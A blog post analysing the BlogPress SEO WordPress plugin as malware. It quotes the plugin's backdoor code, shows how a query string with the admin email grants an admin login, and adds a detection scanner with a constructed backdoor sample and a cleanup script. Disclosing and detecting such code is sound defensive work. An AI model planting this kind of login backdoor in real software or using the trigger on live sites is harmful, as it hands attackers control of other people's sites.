BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML Sitemaps), and never plan on doing so. Anyway, the sender’s name was Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. Why backlinks are important for getting traffic. This is how the plugin works Thanks

Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So I downloaded it, and did not like what I saw. Not only are there malicious components, there are also several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of the stylistic issues:

  • Does not use a unique prefix on function names to avoid collisions with other plugins. Function names include fun_serverpath, SureRemoveDir, fun_create_menu_wplink, wplink_activate, cleansee, etc. While it looks like fun_ is meant to be the prefix, fun is too common a word for that purpose and is used to mark a quantity as a function in some programming styles. There is also a lot of inconsistency among the function names.
  • Saves its settings across several options entries. While this is no longer a great performance issue thanks to autoloading, it still clutters the wp_options table and slows every page load a little. At least the author uses hwe_ as the prefix for most of the options the plugin creates; too bad the same was not done for the functions.
  • Builds raw SQL query strings by hand rather than using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

	// if loginyes and email then login
	// $loginyes and $email come straight from the request; nothing else gates this branch
	if ($loginyes == 1 && $email == get_option('admin_email')) {
		global $wpdb;
		$find_admin_sql = "select * from $tabname where user_login='admin'";
		$find_ana_admin_sql = "select * from $tabname";
		$level = get_usermeta($userid, 'wp_user_level');
		$user = new WP_User(0, $user_login);
		$user_pass = md5($user->user_pass);
		// logs the visitor in as that user and sets the auth cookie
		wp_login($user_login, $user_pass, true);
		wp_setcookie($user_login, $user_pass, true);
		wp_set_current_user($user_id, $user_login);
		// then redirects the browser to whatever $radirect holds
		echo "<script language='javascript'>";
		echo "location.replace('$radirect')";
		echo "</script>";
	}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set from the $_GET superglobal makes it even more worrying. Appending ?loginyes=1&email= (followed by the admin’s email address) to any URL on a site running this plugin logs you in; all you need to know is the admin’s email address. Now, who would have that information?
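As an added example (not code from the post or from the plugin), here is a small Python heuristic that flags the pattern just described in PHP source: an if whose condition depends on raw request input and whose body calls a WordPress function that establishes a logged-in session. It is a line-based heuristic, not a PHP parser, so treat its output as a list of places to read by hand. The two PHP samples are constructed for illustration; the variable and function names in them are assumptions modelled on the snippet above.

```python
"""Heuristic scanner for the parameter-triggered login backdoor pattern.

Added example, not code from the post or from the plugin. It walks PHP source
line by line, finds `if` conditions that depend on raw request input, and
reports any WordPress session-establishing call inside that branch.
"""
import re
from dataclasses import dataclass

# WordPress calls that create an authenticated session for the visitor.
SESSION_CALLS = ("wp_set_current_user", "wp_setcookie", "wp_set_auth_cookie",
                 "wp_login", "wp_signon")
SUPERGLOBALS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")


@dataclass
class Finding:
    line: int      # 1-based line number of the offending `if`
    reason: str


def _tainted_vars(src):
    """Names assigned straight from a request superglobal, e.g. $x = $_GET['x']."""
    names = set(re.findall(r"\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\[", src))
    if re.search(r"\bextract\s*\(\s*\$_(?:GET|POST|REQUEST)", src):
        names.add("*")  # extract() turns every request key into a variable
    return names


def _branch_body(lines, start):
    """Text of the branch starting at lines[start] (best effort, no real parser)."""
    out, depth, braced = [], 0, False
    for line in lines[start:start + 40]:
        out.append(line)
        braced = braced or "{" in line
        depth += line.count("{") - line.count("}")
        if braced and depth <= 0:
            break
        if not braced and len(out) > 1 and not line.strip():
            break  # brace-less branch: stop at the first blank line
    return "\n".join(out)


def scan_php(src):
    findings = []
    tainted = _tainted_vars(src)
    lines = src.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"\s*(?:else\s*)?if\s*\((.*)\)", line)
        if not m:
            continue
        cond = m.group(1)
        uses_input = (
            any(sg in cond for sg in SUPERGLOBALS)
            or "*" in tainted
            or any(re.search(r"\$%s\b" % re.escape(v), cond) for v in tainted)
        )
        if not uses_input:
            continue
        body = _branch_body(lines, i)
        for call in SESSION_CALLS:
            if re.search(r"\b%s\s*\(" % call, body):
                findings.append(Finding(i + 1, "request input gates %s()" % call))
                break
        if "admin_email" in cond:
            findings.append(Finding(i + 1, "branch keyed on admin_email, which is not a secret"))
    return findings


# Constructed sample modelled on the backdoor quoted in the post (names assumed).
MALICIOUS_SAMPLE = """<?php
// constructed sample modelled on the backdoor quoted in the post
$loginyes = $_GET['loginyes'];
$email = $_GET['email'];
if($loginyes==1 && $email==get_option('admin_email')) {
    global $wpdb;
    $user = new WP_User(0, $user_login);
    wp_set_current_user($user_id, $user_login);
    wp_setcookie($user_login, md5($user->user_pass), true);
    echo "<script>location.replace('$redirect')</script>";
}
"""

# Constructed benign sample: request input is used, but behind a capability
# check and a nonce, and nothing in the branch creates a session.
BENIGN_SAMPLE = """<?php
if (isset($_POST['hwe_save']) && current_user_can('manage_options')) {
    check_admin_referer('hwe_settings');
    update_option('hwe_title', sanitize_text_field($_POST['hwe_title']));
}
"""

if __name__ == "__main__":
    for name, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        for f in scan_php(sample) or [Finding(0, "no findings")]:
            print("%s: line %d: %s" % (name, f.line, f.reason))
```

Run it over a plugin directory by reading each .php file into scan_php(); the benign sample shows why the heuristic keys on session calls rather than on request input alone, since ordinary settings pages read $_POST too.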

	function email_send_fun()
	{
		$sub = "BlogPressSeo new installation.";
		// remainder of the function elided in the post
	}

Oh, right, that would be whoever reads the email this function sends. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. It runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then change your admin email address (under Settings > General, the E-mail address option). You’ll also have to clean up your wp_options table by hand, as the author did not provide an uninstall routine.
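For the wp_options cleanup, an added example (not from the post): the prefix-based removal done against an in-memory SQLite stand-in for the table, with constructed rows. The point it makes is that _ is a single-character wildcard in SQL LIKE, so the underscore in hwe_ must be escaped or an unrelated option whose name merely starts with hwe could be deleted too. In MySQL backslash is already the default escape character, so WHERE option_name LIKE 'hwe\_%' works there without the ESCAPE clause SQLite needs.

```python
"""wp_options cleanup by option-name prefix, shown against an in-memory SQLite
stand-in for the table. Added example, not from the post; the rows are
constructed."""
import sqlite3

PLUGIN_PREFIX = "hwe_"  # prefix the post reports the plugin using for its options

# Constructed rows standing in for a wp_options table on an affected site.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.invalid", "yes"),
    ("admin_email", "owner@example.invalid", "yes"),
    ("hwe_title", "BlogPress SEO", "yes"),
    ("hwe_link", "http://spam.invalid", "yes"),
    ("hwelcome_msg", "unrelated option", "no"),  # 'hwe' + 'l': must NOT be deleted
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT UNIQUE,"
        " option_value TEXT, autoload TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
        SAMPLE_OPTIONS,
    )
    conn.commit()
    return conn


def prefix_pattern(prefix):
    """LIKE pattern with '_' and '%' escaped, since a bare '_' matches any one character."""
    return prefix.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_") + "%"


def list_plugin_options(conn, prefix=PLUGIN_PREFIX):
    """Dry run: the option names that would be removed for this prefix."""
    cur = conn.execute(
        "SELECT option_name FROM wp_options WHERE option_name LIKE ? ESCAPE '\\' "
        "ORDER BY option_name",
        (prefix_pattern(prefix),),
    )
    return [row[0] for row in cur.fetchall()]


def delete_plugin_options(conn, prefix=PLUGIN_PREFIX):
    """Remove the plugin's options and return the names that were deleted."""
    names = list_plugin_options(conn, prefix)
    conn.executemany("DELETE FROM wp_options WHERE option_name = ?", [(n,) for n in names])
    conn.commit()
    return names


if __name__ == "__main__":
    db = build_db()
    print("would delete:", list_plugin_options(db))
    print("deleted:", delete_plugin_options(db))
    print("remaining rows:", db.execute("SELECT COUNT(*) FROM wp_options").fetchone()[0])
```

Always run the dry-run SELECT first and read the list, since a plugin prefix like hwe_ is only a convention and the author may have left options without it (the post notes the prefix was used for most, not all, of them).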

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath”.

-John Havlik

[end of transmission, stay tuned]
